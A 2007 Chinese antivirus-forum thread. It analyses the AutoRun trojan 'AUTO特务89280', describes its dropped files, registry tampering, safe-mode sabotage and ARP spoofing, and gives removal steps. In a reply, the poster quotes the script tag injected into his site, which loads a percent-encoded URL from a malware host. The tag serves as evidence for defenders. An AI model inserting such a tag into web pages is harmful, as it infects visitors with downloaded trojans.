微点交流论坛 - 反病毒 - Win32.Troj.AutoRun.te.v ———————

微点交流论坛 » 反病毒 » Win32.Troj.AutoRun.te.v ————————AUTO特务89280

boazyb
新手上路

积分 5
发帖 5
注册 2007-12-15

#1 Win32.Troj.AutoRun.te.v ————————AUTO特务89280

最新AUTO病毒变种分析和解决方案(转) 2007-12-12 21:33:55
大中小
标签：IT/科技 lsass smss auto病毒 u盘病毒
就是那个会导致任务管理器中出现两个lsass和smss，并且存在以下两个文件c:\windows\system32\Com\LSASS.EXE和c:\windows\system32\Com\SMSS.EXE的病毒

病毒全名　Win32.Troj.AutoRun.te.v

病毒长度　89280

威胁级别　★★

中文名称　AUTO特务89280

病毒类型　木马下载器

病毒简介

这是一个AUTO病毒。病毒成功运行后，会在各盘中生成具有隐藏属性的AUTO病毒，注册表被病毒修改后，具有隐藏属性的文件无法查看。众多启动项被病毒删除，包括杀软、系统的启动项，这样会导致机器重启后，杀软失效，使用户机器安全性大大降低。而且该病毒还有破坏安全模式、下载病毒的功能。

标志：AUTO病毒、隐藏文件、破坏安全模式、ARP欺骗。

病毒行为

1.病毒运行后，生成以下病毒文件

%temp%\RarSFX0
（系统临时文件，开始、运行、输入%temp%可打开该文件夹，
可使用清理专家的垃圾文件清理功能删除，删除不掉的文件，
可能是正在运行中。）
%windows%\system32\Com\LSASS.EXE
%windows%\system32\Com\netcfg.000
%windows%\system32\Com\netcfg.dll
%windows%\system32\Com\SMSS.EXE
%Local Settings%\Temporary Internet Files\Content.IE5\EC5UKR17\r[1].htm
%Local Settings%\Temporary Internet Files\Content.IE5\GR8I0NOH\CAYNKA2Y.HTM

2.在各盘中生成AUTO病毒，包括病毒文件pagefile.pif和autorun.inf辅助文件，都具有隐藏属性。

3.病毒会修改注册表，使系统的隐藏功能失效，用户无法操控，只要具有隐藏属性的文件将无法显示。

4.查看启动项，异常的发现启动项中许多系统启动项都被自动删除，包括毒霸的启动项。

5.由于启动项被删除，再使用反间谍的隐蔽软件扫描，也就可以看到有两个隐蔽软件，分别是："异常的autorun.inf"和"Broken SafeBoot"，Broken SafeBoot很明显是破坏安全模式的，这样会使用户中了该病毒以后无法进入安全模式。

6.该病毒还会引发ARP欺骗，导致在同一局域望网内的机器都有被欺骗的可能，明显的症状是：网络时常断开，会有病毒下载到总ARP的机器。
解决方案：

1.将以下文件使用清理专家彻底删除

%temp%\RarSFX0（系统临时文件，开始、运行、输入%temp%可打开该文件夹，
可使用清理专家的垃圾文件清理功能删除，删除不掉的文件，可能是正在运行中。）
%windows%\system32\Com\LSASS.EXE（下面这4个文件可以用清理专家的粉碎器搞定）
%windows%\system32\Com\netcfg.000
%windows%\system32\Com\netcfg.dll
%windows%\system32\Com\SMSS.EXE
%Local Settings%\Temporary Internet Files\Content.IE5\EC5UKR17\r[1].htm
（病毒藏在IE缓存文件夹中，清理专家清理垃圾文件或删除隐
私信息的功能也可以快速清空该文件夹）
%Local Settings%\Temporary Internet Files\Content.IE5\GR8I0NOH\CAYNKA2Y.HTM

2.重启电脑，再运行清理专家，在系统修复中，把引用以上几个文件的加载项全部清除。

3.清理专家的恶意软件查杀功能，可以同时修复被破坏的安全模式。

预防措施：

1.AUTO类病毒，都是利用移动存储介质的自动播放功能传播的。强烈建议使用金山清理专家或毒霸禁用自动播放功能。

2.修补操作系统漏洞、IE漏洞、常用播放器的漏洞，防止病毒通过系统漏洞入侵。

3.及时升级杀毒软件。
手工删除：

一、结束病毒进程
鼠标右键点击“任务栏”，选择“任务管理器”。点击菜单“查看”－>“选择列”，在弹出的对话框中选择“PID（进程标识符）”，并点击“确定”。
找到映象名称为“LSASS.exe”，并且用户名不是“SYSTEM”的一项，记住其PID号。
点击“开始”－》“运行”，输入“CMD”，点击“确定”打开命令行控制台。输入“ntsd –c q -p (PID)”，比如我的计算机上就输入“ntsd –c q -p 1464”。

二、删除病毒文件
打开“我的电脑”，设置显示所有的隐藏文件、系统文件并显示文件扩展名。删除如下几个文件：

C:\Program Files\Common Files\INTEXPLORE.pif、
C:\Program Files\Internet Explorer\INTEXPLORE.com、
C:\WINDOWS\EXERT.exe、
C:\WINDOWS\IO.SYS.BAK、
C:\WINDOWS\LSASS.exe、
C:\WINDOWS\Debug\DebugProgram.exe、
C:\WINDOWS\system32\dxdiag.com、
C:\WINDOWS\system32\MSCONFIG.COM、
C:\WINDOWS\system32\regedit.com

如果硬盘有其他分区，则在其他分区上点击鼠标右键，选择“打开”。删除掉该分区根目录下的“Autorun.inf”和“command.com”文件。

三、删除注册表中的其他垃圾信息
这个病毒该写的注册表位置相当多，如果不进行修复将会有一些系统功能发生异常。

将Windows目录下的“regedit.exe”改名为“regedit.com”并运行，删除以下项目：
HKEY_CLASSES_ROOT\WindowFiles、
HKEY_CURRENT_USER\Software\VB and VBA Program Settings、
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main下面的 Check_Associations项、
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\INTEXPLORE.pif、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面的ToP项。
将HKEY_CLASSES_ROOT\.exe的默认值修改为“exefile”
将HKEY_CLASSES_ROOT\Applications\iexplore.exe\shell\open\command的默认值修改为“"C:\Program Files\Internet Explorer\iexplore.exe" %1”
将HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command的默认值修改为“C:\Program Files\Internet Explorer\IEXPLORE.EXE”
将HKEY_CLASSES_ROOT\ftp\shell\open\command和HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command的默认值修改为“"C:\Program Files\Internet Explorer\iexplore.exe" %1”
将HKEY_CLASSES_ROOT\htmlfile\shell\open\command和HKEY_CLASSES_ROOT\HTTP\shell\open\command的默认值修改为“"C:\Program Files\Internet Explorer\iexplore.exe" –nohome”
将HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet的默认值修改为“IEXPLORE.EXE”。

重新将Windows目录下的regedit扩展名改回exe，至此病毒清除成功，注册表修复完毕

另外加一个该木马的另一个功能~：修改本机上的所有HTML ,HTM,JS文件，在最后加一段代码，打开一个网站，下载木马，我的机器是服务器，被它弄的，。。。。。。

这个AUTO特务89280 微点能杀么？

[ Last edited by boazyb on 2007-12-15 at 23:52 ]

※ ※ ※ 本文纯属【boazyb】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-12-15 23:49

Legend
超级版主

超级版主

积分 77171
发帖 70170
注册 2005-10-29

#2

楼主微点可以很好的防护此类病毒，您如果有病毒样本，可以发送到我们virus@micropoint.com.cn 邮箱，我们会测试后给您回复的，谢谢

※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※

微点官方认证新浪微博：欢迎进入微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息

2007-12-16 00:53

boazyb
新手上路

积分 5
发帖 5
注册 2007-12-15

#3

嘿嘿病毒被我格式化了。
病毒包我是没有了，但我知道它是从哪儿来的。
===========================以下危险====================
就是从这来的：
打开自己的网站时会自动加载http://js./*已屏蔽*/.com/a6.htm和http://js./*已屏蔽*/.com/a2.htm
经查我的网页最后被添加了这么一段代码。（被入侵了！！！！）
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
======================以上危险=======================
这是我在百度上发的帖子，详细记录了病毒来源。请您参考
http://zhidao.baidu.com/question/41374634.html

[ Last edited by Legend on 2007-12-16 at 09:35 ]

※ ※ ※ 本文纯属【boazyb】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-12-16 09:23

boazyb
新手上路

积分 5
发帖 5
注册 2007-12-15

#4

<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script> 里的网址也建议屏蔽啊版主。
刚格式化了硬盘，重装了系统。又中毒了，具体情况我已经发到virus@micropoint.com.cn了。最近这种病毒太猖狂了。ARP传播的病毒。。。。

※ ※ ※ 本文纯属【boazyb】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-12-16 11:02

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号